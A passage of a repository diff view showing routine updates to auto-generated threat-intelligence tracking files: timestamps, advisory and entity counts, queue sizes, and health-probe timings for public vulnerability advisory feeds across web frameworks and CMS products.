| symfony | 2 | 2 | 0 | 220 | 0 |
| traefik | 3 | 3 | 0 | 62 | 0 |
| traefik | 3 | 3 | 0 | 63 | 0 |
| undici | 3 | 3 | 0 | 25 | 0 |
| vite | 5 | 5 | 0 | 150 | 0 |
| vue | 2 | 2 | 0 | 2 | 0 |
| webpack | 1 | 0 | 1 | 0 | 0 |
| werkzeug | 2 | 2 | 0 | 22 | 0 |
| woocommerce | 2 | 2 | 0 | 2 | 1 |
| woocommerce | 2 | 2 | 0 | 14 | 1 |
| wordpress | 1 | 1 | 0 | 53 | 0 |
</pre>
</div>

549
08-threat-intel/generated/dashboard/entities.json
查看文件

文件差异内容过多而无法显示 加载差异

760
08-threat-intel/generated/dashboard/summary.json
查看文件

文件差异内容过多而无法显示 加载差异

612
08-threat-intel/generated/dashboard/systems.json
查看文件

文件差异内容过多而无法显示 加载差异

2
08-threat-intel/generated/entity-catalog-report.md
查看文件

@@ -1,6 +1,6 @@
# 分层实体覆盖与完整度报告
- 生成时间: `2026-03-23T09:54:10+00:00`
- 生成时间: `2026-03-24T09:18:19+00:00`
- 已编目实体: `109`
- 待编目 backlog: `7`
- history-full 已完成: `40`

22
08-threat-intel/generated/entity-completeness.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"cataloged_entity_total": 109,
"candidate_entity_total": 7,
"history_full_complete_count": 40,
@@ -809,10 +809,18 @@
"entity_id": "mattermost--project--mattermost-server",
"entity_type": "project",
"display_name": "Mattermost Server",
"advisory_count": 14,
"advisory_count": 13,
"history_backfill_status": "complete",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"display_name": "mattermost / mattermost-server",
"advisory_count": 12,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--plugin--mattermost-plugins",
"entity_type": "plugin",
@@ -828,14 +836,6 @@
"advisory_count": 1,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"display_name": "mattermost / mattermost-server",
"advisory_count": 1,
"history_backfill_status": "seeded",
"latest_sync_status": "green"
}
],
"backlog_preview": []
@@ -1760,6 +1760,6 @@
"discovery_queue": 7,
"history_queue": 27,
"latest_queue": 10,
"workflow_queue": 2176
"workflow_queue": 2177
}
}

2
08-threat-intel/generated/entity-discovery-backlog.md
查看文件

@@ -1,6 +1,6 @@
# 分层实体发现 Backlog
- 生成时间: `2026-03-23T09:54:10+00:00`
- 生成时间: `2026-03-24T09:18:19+00:00`
- 待编目数量: `7`
| candidate_id | root_system | entity_type | risk | reason | waiting_for | source |

4
08-threat-intel/generated/entity-queues.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"discovery_queue": {
"count": 7,
"items": [
@@ -408,7 +408,7 @@
]
},
"workflow_queue": {
"count": 2176,
"count": 2177,
"items": [
{
"canonical_id": "adminer--CVE-2026-25878",

2947
08-threat-intel/generated/lab-enqueue-summary.json
查看文件

文件差异内容过多而无法显示 加载差异

12
08-threat-intel/generated/latest-ingest.md
查看文件

@@ -1,13 +1,13 @@
# 最新同步摘要
- 渲染时间: `2026-03-23T09:54:10+00:00`
- 渲染时间: `2026-03-24T09:18:19+00:00`
- 系统数量: `62`
- Advisory 数量: `2360`
- Advisory 数量: `2371`
- 已编目实体数量: `109`
- 待编目 backlog 数量: `7`
- 重点 Markdown 数量: `158`
- 重点 Markdown 数量: `168`
- Run Bundle 数量: `89`
- 新增记录: `2`
- 更新记录: `5`
- Triage 数量: `1175`
- 新增记录: `11`
- 更新记录: `4`
- Triage 数量: `1176`
- 失败的 source adapter: `0`

19
08-threat-intel/generated/monitor-summary.json
查看文件

@@ -1,22 +1,23 @@
{
"generated_at": "2026-03-23T09:53:46+00:00",
"generated_at": "2026-03-24T09:17:44+00:00",
"active_source_count": 102,
"green_source_count": 102,
"source_failure_count": 0,
"open_alert_count": 0,
"resolved_alert_count": 101,
"last_fully_green_run": "2026-03-23T09:53:46+00:00",
"last_fully_green_run": "2026-03-24T09:17:44+00:00",
"source_catalog": {
"system_count": 62,
"source_count": 179,
"retired_source_count": 77
},
"ingest": {
"new_count": 2,
"updated_count": 5,
"new_count": 11,
"updated_count": 4,
"failure_count": 0,
"systems_touched": [
"caddy",
"haproxy",
"mattermost",
"traefik"
]
},
@@ -37,14 +38,14 @@
"cataloged_entity_total": 109,
"latest_version_synced_count": 94,
"source_gap_count": 15,
"security_version_total": 6180,
"security_version_total": 6242,
"security_version_entity_count": 82,
"auto_promoted_entity_count": 10,
"lab_enqueued_count": 2
"lab_enqueued_count": 11
},
"lab_enqueue": {
"enqueued": 2,
"queue_total": 2360,
"enqueued": 11,
"queue_total": 2371,
"pending_count": 0
}
}

1542
08-threat-intel/generated/release-index.json
查看文件

文件差异内容过多而无法显示 加载差异

15
08-threat-intel/generated/run-summary.json
查看文件

@@ -1,17 +1,18 @@
{
"generated_at": "2026-03-23T09:54:10+00:00",
"generated_at": "2026-03-24T09:18:19+00:00",
"system_count": 62,
"advisory_count": 2360,
"advisory_count": 2371,
"cataloged_entity_total": 109,
"candidate_entity_total": 7,
"markdown_count": 158,
"new_count": 2,
"updated_count": 5,
"markdown_count": 168,
"new_count": 11,
"updated_count": 4,
"systems_touched": [
"caddy",
"haproxy",
"mattermost",
"traefik"
],
"triage_count": 1175,
"triage_count": 1176,
"run_bundle_count": 89,
"failures": []
}

2
08-threat-intel/generated/source-catalog-audit.json
查看文件

@@ -1,5 +1,5 @@
{
"generated_at": "2026-03-23T09:26:43+00:00",
"generated_at": "2026-03-24T09:17:05+00:00",
"system_count": 62,
"source_count": 179,
"active_source_count": 102,

2
08-threat-intel/generated/source-catalog-audit.md
查看文件

@@ -1,6 +1,6 @@
# Source Catalog Audit
- generated_at: `2026-03-23T09:26:43+00:00`
- generated_at: `2026-03-24T09:17:05+00:00`
- systems: `62`
- sources: `179`
- active_sources: `102`

288
08-threat-intel/generated/source-health.json
查看文件

@@ -1,17 +1,17 @@
{
"generated_at": "2026-03-23T09:53:46+00:00",
"generated_at": "2026-03-24T09:17:44+00:00",
"active_source_count": 102,
"green_source_count": 102,
"failure_count": 0,
"all_green": true,
"last_fully_green_run": "2026-03-23T09:53:46+00:00",
"last_fully_green_run": "2026-03-24T09:17:44+00:00",
"retries_performed": 0,
"probes": [
{
"system_id": "adminer",
"source_name": "OSV Adminer",
"source_kind": "osv-batch",
"elapsed_seconds": 5.754,
"elapsed_seconds": 2.321,
"kind": "osv-batch",
"items_seen": 1
},
@@ -19,7 +19,7 @@
"system_id": "adobe-commerce",
"source_name": "Adobe Magento Security Index",
"source_kind": "vendor-index",
"elapsed_seconds": 0.028,
"elapsed_seconds": 0.029,
"kind": "vendor-index",
"items_seen": 46
},
@@ -27,7 +27,7 @@
"system_id": "angular",
"source_name": "OSV Angular",
"source_kind": "osv-batch",
"elapsed_seconds": 3.837,
"elapsed_seconds": 1.538,
"kind": "osv-batch",
"items_seen": 1
},
@@ -35,7 +35,7 @@
"system_id": "apache-httpd",
"source_name": "Apache HTTPD Security",
"source_kind": "html-links",
"elapsed_seconds": 3.3,
"elapsed_seconds": 1.611,
"kind": "html-links",
"items_seen": 182
},
@@ -43,7 +43,7 @@
"system_id": "apache-httpd",
"source_name": "CISA KEV Apache HTTPD",
"source_kind": "kev-json",
"elapsed_seconds": 4.396,
"elapsed_seconds": 1.7,
"kind": "kev-json",
"items_seen": 1551
},
@@ -51,7 +51,7 @@
"system_id": "apache-tomcat",
"source_name": "Apache Tomcat Security",
"source_kind": "html-links",
"elapsed_seconds": 3.608,
"elapsed_seconds": 1.614,
"kind": "html-links",
"items_seen": 270
},
@@ -59,7 +59,7 @@
"system_id": "apache-tomcat",
"source_name": "CISA KEV Tomcat",
"source_kind": "kev-json",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.728,
"kind": "kev-json",
"items_seen": 1551
},
@@ -67,7 +67,7 @@
"system_id": "aspnet-core",
"source_name": "OSV ASP.NET Core",
"source_kind": "osv-batch",
"elapsed_seconds": 5.42,
"elapsed_seconds": 2.176,
"kind": "osv-batch",
"items_seen": 1
},
@@ -75,7 +75,7 @@
"system_id": "astro",
"source_name": "OSV Astro",
"source_kind": "osv-batch",
"elapsed_seconds": 3.608,
"elapsed_seconds": 1.536,
"kind": "osv-batch",
"items_seen": 1
},
@@ -83,7 +83,7 @@
"system_id": "caddy",
"source_name": "OSV Caddy",
"source_kind": "osv-batch",
"elapsed_seconds": 5.339,
"elapsed_seconds": 2.207,
"kind": "osv-batch",
"items_seen": 1
},
@@ -91,7 +91,7 @@
"system_id": "directus",
"source_name": "Directus GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.034,
"elapsed_seconds": 0.049,
"kind": "html-links",
"items_seen": 127
},
@@ -99,7 +99,7 @@
"system_id": "directus",
"source_name": "OSV Directus",
"source_kind": "osv-batch",
"elapsed_seconds": 1.656,
"elapsed_seconds": 0.954,
"kind": "osv-batch",
"items_seen": 1
},
@@ -115,7 +115,7 @@
"system_id": "discourse",
"source_name": "Discourse Security RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.03,
"elapsed_seconds": 0.029,
"kind": "rss-feed",
"items_seen": 3
},
@@ -123,7 +123,7 @@
"system_id": "discourse",
"source_name": "OSV Discourse",
"source_kind": "osv-batch",
"elapsed_seconds": 1.516,
"elapsed_seconds": 0.824,
"kind": "osv-batch",
"items_seen": 1
},
@@ -131,7 +131,7 @@
"system_id": "django",
"source_name": "Django Security Releases Archive",
"source_kind": "vendor-index",
"elapsed_seconds": 2.863,
"elapsed_seconds": 1.532,
"kind": "vendor-index",
"items_seen": 1276
},
@@ -139,7 +139,7 @@
"system_id": "django",
"source_name": "Django Security Weblog",
"source_kind": "vendor-index",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.508,
"kind": "vendor-index",
"items_seen": 332
},
@@ -147,7 +147,7 @@
"system_id": "django",
"source_name": "OSV Django",
"source_kind": "osv-batch",
"elapsed_seconds": 5.346,
"elapsed_seconds": 3.099,
"kind": "osv-batch",
"items_seen": 1
},
@@ -155,7 +155,7 @@
"system_id": "drupal",
"source_name": "Drupal Security Advisories RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.038,
"elapsed_seconds": 0.051,
"kind": "rss-feed",
"items_seen": 20
},
@@ -163,7 +163,7 @@
"system_id": "drupal",
"source_name": "OSV Drupal",
"source_kind": "osv-batch",
"elapsed_seconds": 2.965,
"elapsed_seconds": 1.795,
"kind": "osv-batch",
"items_seen": 1
},
@@ -171,7 +171,7 @@
"system_id": "echo",
"source_name": "OSV Echo",
"source_kind": "osv-batch",
"elapsed_seconds": 4.843,
"elapsed_seconds": 2.15,
"kind": "osv-batch",
"items_seen": 1
},
@@ -179,7 +179,7 @@
"system_id": "esbuild",
"source_name": "OSV esbuild",
"source_kind": "osv-batch",
"elapsed_seconds": 3.612,
"elapsed_seconds": 1.611,
"kind": "osv-batch",
"items_seen": 1
},
@@ -187,7 +187,7 @@
"system_id": "express",
"source_name": "OSV Express",
"source_kind": "osv-batch",
"elapsed_seconds": 3.3,
"elapsed_seconds": 1.536,
"kind": "osv-batch",
"items_seen": 1
},
@@ -195,7 +195,7 @@
"system_id": "fastify",
"source_name": "OSV Fastify",
"source_kind": "osv-batch",
"elapsed_seconds": 3.056,
"elapsed_seconds": 1.551,
"kind": "osv-batch",
"items_seen": 1
},
@@ -203,7 +203,7 @@
"system_id": "flask",
"source_name": "OSV Flask",
"source_kind": "osv-batch",
"elapsed_seconds": 4.622,
"elapsed_seconds": 2.195,
"kind": "osv-batch",
"items_seen": 1
},
@@ -211,7 +211,7 @@
"system_id": "ghost",
"source_name": "Ghost GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.037,
"elapsed_seconds": 0.051,
"kind": "html-links",
"items_seen": 119
},
@@ -219,7 +219,7 @@
"system_id": "ghost",
"source_name": "OSV Ghost",
"source_kind": "osv-batch",
"elapsed_seconds": 2.059,
"elapsed_seconds": 0.956,
"kind": "osv-batch",
"items_seen": 1
},
@@ -227,7 +227,7 @@
"system_id": "gin",
"source_name": "OSV Gin",
"source_kind": "osv-batch",
"elapsed_seconds": 4.398,
"elapsed_seconds": 2.154,
"kind": "osv-batch",
"items_seen": 1
},
@@ -235,7 +235,7 @@
"system_id": "gitea",
"source_name": "OSV Gitea",
"source_kind": "osv-batch",
"elapsed_seconds": 5.337,
"elapsed_seconds": 2.382,
"kind": "osv-batch",
"items_seen": 1
},
@@ -243,7 +243,7 @@
"system_id": "gitlab-ce",
"source_name": "GitLab Advisory Database",
"source_kind": "html-links",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "html-links",
"items_seen": 5
},
@@ -251,7 +251,7 @@
"system_id": "gitlab-ce",
"source_name": "GitLab Security Releases Atom",
"source_kind": "atom-feed",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "atom-feed",
"items_seen": 186
},
@@ -259,7 +259,7 @@
"system_id": "grafana",
"source_name": "CISA KEV Grafana",
"source_kind": "kev-json",
"elapsed_seconds": 4.395,
"elapsed_seconds": 1.738,
"kind": "kev-json",
"items_seen": 1551
},
@@ -267,7 +267,7 @@
"system_id": "grafana",
"source_name": "Grafana Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "html-links",
"items_seen": 159
},
@@ -275,7 +275,7 @@
"system_id": "hapi",
"source_name": "OSV Hapi",
"source_kind": "osv-batch",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.744,
"kind": "osv-batch",
"items_seen": 1
},
@@ -283,7 +283,7 @@
"system_id": "haproxy",
"source_name": "HAProxy Blog Feed",
"source_kind": "rss-feed",
"elapsed_seconds": 3.618,
"elapsed_seconds": 1.7,
"kind": "rss-feed",
"items_seen": 10
},
@@ -291,7 +291,7 @@
"system_id": "jenkins",
"source_name": "Jenkins Security Advisories RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 3.842,
"elapsed_seconds": 1.737,
"kind": "rss-feed",
"items_seen": 96
},
@@ -299,7 +299,7 @@
"system_id": "joomla",
"source_name": "Joomla Security Centre",
"source_kind": "html-links",
"elapsed_seconds": 0.038,
"elapsed_seconds": 0.051,
"kind": "html-links",
"items_seen": 139
},
@@ -307,7 +307,7 @@
"system_id": "joomla",
"source_name": "OSV Joomla",
"source_kind": "osv-batch",
"elapsed_seconds": 1.648,
"elapsed_seconds": 0.899,
"kind": "osv-batch",
"items_seen": 1
},
@@ -315,7 +315,7 @@
"system_id": "kibana",
"source_name": "Elastic Product Security",
"source_kind": "html-links",
"elapsed_seconds": 4.01,
"elapsed_seconds": 1.738,
"kind": "html-links",
"items_seen": 66
},
@@ -323,7 +323,7 @@
"system_id": "kibana",
"source_name": "NVD Kibana",
"source_kind": "nvd-search",
"elapsed_seconds": 6.119,
"elapsed_seconds": 3.279,
"kind": "nvd-search",
"items_seen": 1
},
@@ -331,7 +331,7 @@
"system_id": "koa",
"source_name": "OSV Koa",
"source_kind": "osv-batch",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.535,
"kind": "osv-batch",
"items_seen": 1
},
@@ -339,7 +339,7 @@
"system_id": "laravel",
"source_name": "OSV Laravel",
"source_kind": "osv-batch",
"elapsed_seconds": 3.633,
"elapsed_seconds": 2.335,
"kind": "osv-batch",
"items_seen": 1
},
@@ -347,7 +347,7 @@
"system_id": "magento-open-source",
"source_name": "Magento GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.02,
"elapsed_seconds": 0.022,
"kind": "html-links",
"items_seen": 99
},
@@ -355,7 +355,7 @@
"system_id": "magento-open-source",
"source_name": "OSV Magento Open Source",
"source_kind": "osv-batch",
"elapsed_seconds": 1.648,
"elapsed_seconds": 0.855,
"kind": "osv-batch",
"items_seen": 1
},
@@ -363,7 +363,7 @@
"system_id": "magento-open-source",
"source_name": "Sansec Research",
"source_kind": "html-links",
"elapsed_seconds": 0.02,
"elapsed_seconds": 0.022,
"kind": "html-links",
"items_seen": 134
},
@@ -371,7 +371,7 @@
"system_id": "mattermost",
"source_name": "Mattermost Security Updates JSON",
"source_kind": "json-feed",
"elapsed_seconds": 4.201,
"elapsed_seconds": 1.742,
"kind": "json-feed",
"items_seen": 594
},
@@ -379,7 +379,7 @@
"system_id": "mattermost",
"source_name": "OSV Mattermost",
"source_kind": "osv-batch",
"elapsed_seconds": 6.79,
"elapsed_seconds": 3.206,
"kind": "osv-batch",
"items_seen": 1
},
@@ -387,7 +387,7 @@
"system_id": "mediawiki",
"source_name": "MediaWiki Announce RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.033,
"elapsed_seconds": 0.048,
"kind": "rss-feed",
"items_seen": 30
},
@@ -395,7 +395,7 @@
"system_id": "mediawiki",
"source_name": "OSV MediaWiki",
"source_kind": "osv-batch",
"elapsed_seconds": 1.657,
"elapsed_seconds": 1.007,
"kind": "osv-batch",
"items_seen": 1
},
@@ -403,7 +403,7 @@
"system_id": "medusa",
"source_name": "OSV Medusa",
"source_kind": "osv-batch",
"elapsed_seconds": 1.493,
"elapsed_seconds": 0.852,
"kind": "osv-batch",
"items_seen": 1
},
@@ -411,7 +411,7 @@
"system_id": "moodle",
"source_name": "OSV Moodle",
"source_kind": "osv-batch",
"elapsed_seconds": 4.487,
"elapsed_seconds": 3.854,
"kind": "osv-batch",
"items_seen": 1
},
@@ -419,7 +419,7 @@
"system_id": "nestjs",
"source_name": "OSV NestJS",
"source_kind": "osv-batch",
"elapsed_seconds": 2.84,
"elapsed_seconds": 1.535,
"kind": "osv-batch",
"items_seen": 1
},
@@ -427,7 +427,7 @@
"system_id": "nextjs",
"source_name": "OSV Next.js",
"source_kind": "osv-batch",
"elapsed_seconds": 2.255,
"elapsed_seconds": 0.918,
"kind": "osv-batch",
"items_seen": 1
},
@@ -435,7 +435,7 @@
"system_id": "nginx",
"source_name": "CISA KEV NGINX",
"source_kind": "kev-json",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.7,
"kind": "kev-json",
"items_seen": 1551
},
@@ -443,7 +443,7 @@
"system_id": "nginx",
"source_name": "NGINX Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 3.293,
"elapsed_seconds": 1.551,
"kind": "html-links",
"items_seen": 138
},
@@ -451,7 +451,7 @@
"system_id": "nodejs",
"source_name": "CISA KEV Node.js",
"source_kind": "kev-json",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.728,
"kind": "kev-json",
"items_seen": 1551
},
@@ -459,15 +459,15 @@
"system_id": "nodejs",
"source_name": "Node.js Security Releases",
"source_kind": "html-links",
"elapsed_seconds": 1.723,
"elapsed_seconds": 0.906,
"kind": "html-links",
"items_seen": 74
"items_seen": 73
},
{
"system_id": "nuxt",
"source_name": "OSV Nuxt",
"source_kind": "osv-batch",
"elapsed_seconds": 3.294,
"elapsed_seconds": 1.452,
"kind": "osv-batch",
"items_seen": 1
},
@@ -475,7 +475,7 @@
"system_id": "opencart",
"source_name": "OSV OpenCart",
"source_kind": "osv-batch",
"elapsed_seconds": 2.259,
"elapsed_seconds": 0.887,
"kind": "osv-batch",
"items_seen": 1
},
@@ -483,7 +483,7 @@
"system_id": "opencart",
"source_name": "OpenCart Releases",
"source_kind": "html-links",
"elapsed_seconds": 0.006,
"elapsed_seconds": 0.012,
"kind": "html-links",
"items_seen": 1500
},
@@ -491,7 +491,7 @@
"system_id": "openmage",
"source_name": "OSV OpenMage",
"source_kind": "osv-batch",
"elapsed_seconds": 1.636,
"elapsed_seconds": 0.93,
"kind": "osv-batch",
"items_seen": 1
},
@@ -499,7 +499,7 @@
"system_id": "openmage",
"source_name": "OpenMage GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.017,
"elapsed_seconds": 0.019,
"kind": "html-links",
"items_seen": 125
},
@@ -507,7 +507,7 @@
"system_id": "phpmyadmin",
"source_name": "OSV phpMyAdmin",
"source_kind": "osv-batch",
"elapsed_seconds": 5.654,
"elapsed_seconds": 2.616,
"kind": "osv-batch",
"items_seen": 1
},
@@ -515,7 +515,7 @@
"system_id": "phpmyadmin",
"source_name": "phpMyAdmin Security Page",
"source_kind": "html-links",
"elapsed_seconds": 3.618,
"elapsed_seconds": 1.7,
"kind": "html-links",
"items_seen": 263
},
@@ -523,7 +523,7 @@
"system_id": "prestashop",
"source_name": "Friends Of Presta Security",
"source_kind": "html-links",
"elapsed_seconds": 0.012,
"elapsed_seconds": 0.014,
"kind": "html-links",
"items_seen": 38
},
@@ -531,7 +531,7 @@
"system_id": "prestashop",
"source_name": "GitHub PrestaShop Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.011,
"elapsed_seconds": 0.015,
"kind": "html-links",
"items_seen": 127
},
@@ -539,7 +539,7 @@
"system_id": "prestashop",
"source_name": "OSV PrestaShop",
"source_kind": "osv-batch",
"elapsed_seconds": 1.734,
"elapsed_seconds": 0.919,
"kind": "osv-batch",
"items_seen": 1
},
@@ -547,7 +547,7 @@
"system_id": "prestashop",
"source_name": "PrestaShop Security Page",
"source_kind": "html-links",
"elapsed_seconds": 0.011,
"elapsed_seconds": 0.015,
"kind": "html-links",
"items_seen": 60
},
@@ -555,7 +555,7 @@
"system_id": "rails",
"source_name": "OSV Rails",
"source_kind": "osv-batch",
"elapsed_seconds": 4.201,
"elapsed_seconds": 2.182,
"kind": "osv-batch",
"items_seen": 1
},
@@ -563,7 +563,7 @@
"system_id": "react",
"source_name": "OSV React",
"source_kind": "osv-batch",
"elapsed_seconds": 1.949,
"elapsed_seconds": 0.873,
"kind": "osv-batch",
"items_seen": 1
},
@@ -571,7 +571,7 @@
"system_id": "redmine",
"source_name": "OSV Redmine",
"source_kind": "osv-batch",
"elapsed_seconds": 5.985,
"elapsed_seconds": 2.275,
"kind": "osv-batch",
"items_seen": 1
},
@@ -579,7 +579,7 @@
"system_id": "redmine",
"source_name": "Redmine Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 4.382,
"elapsed_seconds": 1.744,
"kind": "html-links",
"items_seen": 371
},
@@ -587,7 +587,7 @@
"system_id": "saleor",
"source_name": "GitHub Saleor Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.005,
"elapsed_seconds": 0.006,
"kind": "html-links",
"items_seen": 120
},
@@ -595,7 +595,7 @@
"system_id": "saleor",
"source_name": "OSV Saleor",
"source_kind": "osv-batch",
"elapsed_seconds": 1.493,
"elapsed_seconds": 0.881,
"kind": "osv-batch",
"items_seen": 1
},
@@ -603,7 +603,7 @@
"system_id": "shopware",
"source_name": "OSV Shopware",
"source_kind": "osv-batch",
"elapsed_seconds": 1.731,
"elapsed_seconds": 1.146,
"kind": "osv-batch",
"items_seen": 1
},
@@ -611,7 +611,7 @@
"system_id": "shopware",
"source_name": "Shopware Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.01,
"elapsed_seconds": 0.014,
"kind": "html-links",
"items_seen": 129
},
@@ -619,7 +619,7 @@
"system_id": "spring-boot",
"source_name": "OSV Spring Boot",
"source_kind": "osv-batch",
"elapsed_seconds": 4.783,
"elapsed_seconds": 1.809,
"kind": "osv-batch",
"items_seen": 1
},
@@ -627,7 +627,7 @@
"system_id": "spring-boot",
"source_name": "Spring Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 2.254,
"elapsed_seconds": 1.134,
"kind": "html-links",
"items_seen": 118
},
@@ -635,7 +635,7 @@
"system_id": "spring-framework",
"source_name": "OSV Spring Framework",
"source_kind": "osv-batch",
"elapsed_seconds": 3.609,
"elapsed_seconds": 1.673,
"kind": "osv-batch",
"items_seen": 1
},
@@ -643,7 +643,7 @@
"system_id": "spring-framework",
"source_name": "Spring Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 2.024,
"elapsed_seconds": 0.951,
"kind": "html-links",
"items_seen": 118
},
@@ -651,7 +651,7 @@
"system_id": "spring-security",
"source_name": "OSV Spring Security",
"source_kind": "osv-batch",
"elapsed_seconds": 3.676,
"elapsed_seconds": 1.742,
"kind": "osv-batch",
"items_seen": 1
},
@@ -659,7 +659,7 @@
"system_id": "spring-security",
"source_name": "Spring Security Advisories",
"source_kind": "html-links",
"elapsed_seconds": 2.088,
"elapsed_seconds": 0.977,
"kind": "html-links",
"items_seen": 118
},
@@ -667,7 +667,7 @@
"system_id": "strapi",
"source_name": "OSV Strapi",
"source_kind": "osv-batch",
"elapsed_seconds": 1.539,
"elapsed_seconds": 1.0,
"kind": "osv-batch",
"items_seen": 1
},
@@ -675,7 +675,7 @@
"system_id": "strapi",
"source_name": "Strapi GitHub Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.036,
"elapsed_seconds": 0.05,
"kind": "html-links",
"items_seen": 124
},
@@ -683,7 +683,7 @@
"system_id": "sveltekit",
"source_name": "OSV SvelteKit",
"source_kind": "osv-batch",
"elapsed_seconds": 3.062,
"elapsed_seconds": 1.508,
"kind": "osv-batch",
"items_seen": 1
},
@@ -691,7 +691,7 @@
"system_id": "symfony",
"source_name": "OSV Symfony",
"source_kind": "osv-batch",
"elapsed_seconds": 5.456,
"elapsed_seconds": 2.93,
"kind": "osv-batch",
"items_seen": 1
},
@@ -699,7 +699,7 @@
"system_id": "traefik",
"source_name": "OSV Traefik",
"source_kind": "osv-batch",
"elapsed_seconds": 4.843,
"elapsed_seconds": 2.341,
"kind": "osv-batch",
"items_seen": 1
},
@@ -707,7 +707,7 @@
"system_id": "undici",
"source_name": "OSV Undici",
"source_kind": "osv-batch",
"elapsed_seconds": 3.618,
"elapsed_seconds": 1.614,
"kind": "osv-batch",
"items_seen": 1
},
@@ -715,7 +715,7 @@
"system_id": "vite",
"source_name": "OSV Vite",
"source_kind": "osv-batch",
"elapsed_seconds": 2.612,
"elapsed_seconds": 1.538,
"kind": "osv-batch",
"items_seen": 1
},
@@ -723,7 +723,7 @@
"system_id": "vue",
"source_name": "OSV Vue",
"source_kind": "osv-batch",
"elapsed_seconds": 1.616,
"elapsed_seconds": 0.835,
"kind": "osv-batch",
"items_seen": 1
},
@@ -731,7 +731,7 @@
"system_id": "webpack",
"source_name": "OSV webpack",
"source_kind": "osv-batch",
"elapsed_seconds": 3.048,
"elapsed_seconds": 1.614,
"kind": "osv-batch",
"items_seen": 1
},
@@ -739,7 +739,7 @@
"system_id": "werkzeug",
"source_name": "OSV Werkzeug",
"source_kind": "osv-batch",
"elapsed_seconds": 4.011,
"elapsed_seconds": 2.177,
"kind": "osv-batch",
"items_seen": 1
},
@@ -747,7 +747,7 @@
"system_id": "woocommerce",
"source_name": "GitHub WooCommerce Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.013,
"elapsed_seconds": 0.017,
"kind": "html-links",
"items_seen": 107
},
@@ -755,7 +755,7 @@
"system_id": "woocommerce",
"source_name": "OSV WooCommerce",
"source_kind": "osv-batch",
"elapsed_seconds": 1.961,
"elapsed_seconds": 0.802,
"kind": "osv-batch",
"items_seen": 1
},
@@ -763,7 +763,7 @@
"system_id": "woocommerce",
"source_name": "Patchstack Database",
"source_kind": "html-links",
"elapsed_seconds": 0.014,
"elapsed_seconds": 0.017,
"kind": "html-links",
"items_seen": 193
},
@@ -771,7 +771,7 @@
"system_id": "woocommerce",
"source_name": "Woo Developer Advisories",
"source_kind": "html-links",
"elapsed_seconds": 0.017,
"elapsed_seconds": 0.019,
"kind": "html-links",
"items_seen": 121
},
@@ -779,7 +779,7 @@
"system_id": "woocommerce",
"source_name": "Wordfence Vulnerability Database",
"source_kind": "html-links",
"elapsed_seconds": 0.013,
"elapsed_seconds": 0.015,
"kind": "html-links",
"items_seen": 0
},
@@ -787,7 +787,7 @@
"system_id": "wordpress",
"source_name": "Patchstack Database",
"source_kind": "html-links",
"elapsed_seconds": 0.04,
"elapsed_seconds": 0.053,
"kind": "html-links",
"items_seen": 193
},
@@ -795,7 +795,7 @@
"system_id": "wordpress",
"source_name": "PortSwigger Research",
"source_kind": "html-links",
"elapsed_seconds": 2.128,
"elapsed_seconds": 1.509,
"kind": "html-links",
"items_seen": 99
},
@@ -803,7 +803,7 @@
"system_id": "wordpress",
"source_name": "WPScan Vulnerability Database",
"source_kind": "html-links",
"elapsed_seconds": 0.041,
"elapsed_seconds": 0.053,
"kind": "html-links",
"items_seen": 74
},
@@ -811,7 +811,7 @@
"system_id": "wordpress",
"source_name": "WordPress Security News RSS",
"source_kind": "rss-feed",
"elapsed_seconds": 0.043,
"elapsed_seconds": 0.055,
"kind": "rss-feed",
"items_seen": 10
},
@@ -819,7 +819,7 @@
"system_id": "wordpress",
"source_name": "Wordfence Vulnerability Database",
"source_kind": "html-links",
"elapsed_seconds": 0.043,
"elapsed_seconds": 0.055,
"kind": "html-links",
"items_seen": 0
}
@@ -827,73 +827,73 @@
"failures": [],
"slow_sources": [
{
"system_id": "mattermost",
"source_name": "OSV Mattermost",
"system_id": "moodle",
"source_name": "OSV Moodle",
"source_kind": "osv-batch",
"elapsed_seconds": 6.79,
"elapsed_seconds": 3.854,
"status": "ok"
},
{
"system_id": "kibana",
"source_name": "NVD Kibana",
"source_kind": "nvd-search",
"elapsed_seconds": 6.119,
"elapsed_seconds": 3.279,
"status": "ok"
},
{
"system_id": "redmine",
"source_name": "OSV Redmine",
"system_id": "mattermost",
"source_name": "OSV Mattermost",
"source_kind": "osv-batch",
"elapsed_seconds": 5.985,
"status": "ok"
},
{
"system_id": "adminer",
"source_name": "OSV Adminer",
"source_kind": "osv-batch",
